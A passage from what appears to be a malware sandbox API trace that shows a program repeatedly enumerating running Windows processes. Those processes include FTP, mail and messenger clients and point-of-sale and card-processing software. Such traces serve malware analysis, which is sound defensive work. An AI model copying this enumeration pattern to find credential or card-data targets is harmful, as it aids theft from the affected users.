cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0170.091] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0170.094] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0170.096] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0170.099] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0170.102] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0170.105] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0170.108] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0170.111] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0170.113] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0170.116] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0170.119] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0170.122] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0170.125] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0170.127] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0170.131] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0170.134] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0170.137] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0170.141] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0170.144] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0170.147] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0170.149] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0170.152] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0170.155] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0170.158] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0170.161] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0170.169] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0170.171] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0170.173] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0170.176] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0170.178] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0170.181] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0170.183] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0170.185] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0170.186] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0170.188] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0170.190] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0170.193] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0170.220] CloseHandle (hObject=0x13dc) returned 1 [0170.220] Sleep (dwMilliseconds=0x64) [0170.338] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2068 [0170.355] Process32First (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0170.357] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0170.360] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0170.362] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0170.364] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0170.366] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0170.368] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0170.370] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0170.372] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0170.402] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.406] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.408] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0170.410] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.413] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.416] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.418] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.420] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.423] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.425] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.427] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0170.430] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0170.432] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0170.435] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0170.468] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.470] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0170.471] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0170.473] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0170.475] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0170.476] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0170.478] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0170.479] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.481] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0170.482] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0170.484] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0170.486] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0170.488] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.490] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0170.492] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0170.494] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0170.496] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0170.498] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0170.500] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0170.502] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0170.538] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0170.540] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0170.543] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0170.545] Process32Next (in: hSnapshot=0x2068, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, 